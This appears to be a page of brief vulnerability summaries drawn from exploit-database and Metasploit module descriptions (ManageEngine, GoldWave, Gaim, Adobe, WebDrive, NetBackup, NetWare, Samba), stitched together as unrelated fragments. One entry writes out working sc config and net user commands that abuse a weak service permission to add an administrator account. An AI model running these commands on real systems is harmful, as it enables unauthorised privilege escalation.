A vulnerability in ManageEngine ADSelfService Plus could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. The vulnerability exists due to insufficient validation of user-supplied data. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted system. A successful exploit could allow the attacker to execute arbitrary code on the system with the privileges of the web server process.
GoldWave 5.70 is vulnerable to a buffer overflow vulnerability when a specially crafted file is opened. This can be exploited to execute arbitrary code by corrupting the SEH chain and overwriting the return address with a pointer to the malicious code. The vulnerability is triggered when a user opens a specially crafted file with the application.
The script injection vulnerability allows an attacker to inject malicious scripts into a webpage, which can be executed by the victim's browser. In this specific case, the vulnerability is present in both VBScript and JavaScript sections of the code.
This code demonstrates a stack overflow vulnerability in Gaim 1.2.1 when processing email addresses. It causes a segfault when executing the /vuln command in a conversation. If a protocol allows a 10002-character message to go through, it also segfaults the recipient. The vulnerability is due to the stack being overwritten with 'A's and the return address of the function being set to 0x41414141.
To exploit this issue, attackers require local, interactive access to an affected computer. The following example commands are available: sc stop "AdobeActiveFileMonitor8.0" sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add" sc start "AdobeActiveFileMonitor8.0" runas /noprofile /user:%COMPUTERNAME%adobe cmd
The 'WebDrive Service' is installed with an empty security descriptor. A malicious user can stop the service, then invoke the 'sc config' command to replace the binary path with a value of choice, then restart the service to run the command with SYSTEM privileges.
This module allows arbitrary command execution on an ephemeral port opened by Veritas NetBackup, whilst an administrator is authenticated. The port is opened and allows direct console access as root or SYSTEM from any source address.
This module exploits a stack overflow in the NetWare CIFS.NLM driver. Since the driver runs in the kernel space, a failed exploit attempt can cause the OS to reboot.
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems.
Services By CQR